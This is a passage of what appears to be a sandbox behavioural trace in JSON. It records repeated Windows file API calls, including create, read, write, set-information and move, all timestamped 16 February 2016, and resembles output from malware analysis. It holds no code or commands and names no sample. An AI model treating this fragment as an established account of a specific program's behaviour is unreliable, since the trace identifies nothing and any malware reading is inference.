"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,805", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,805", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,815", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,825", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,825", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,835", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,835", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,845", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:50,855", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,855", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,855", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:50,865", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,875", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,875", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", 
"api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,885", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,895", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,895", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,905", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,905", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,915", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,915", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,925", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,925", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:50,925", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,935", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,935", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,935", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,945", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,945", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,955", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,955", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "MoveFileWithProgressW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:50,955", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,955", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,965", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,965", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,965", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 
17:41:50,975", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,975", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,985", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,985", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,985", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,995", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,995", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,995", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "NtSetInformationFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,005", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,005", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,016", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,016", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,016", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,016", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,016", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,016", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,016", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,016", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,016", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,026", "api": "NtFreeVirtualMemory"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,026", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,026", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,036", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtWriteFile"}, {"category": "filesystem", 
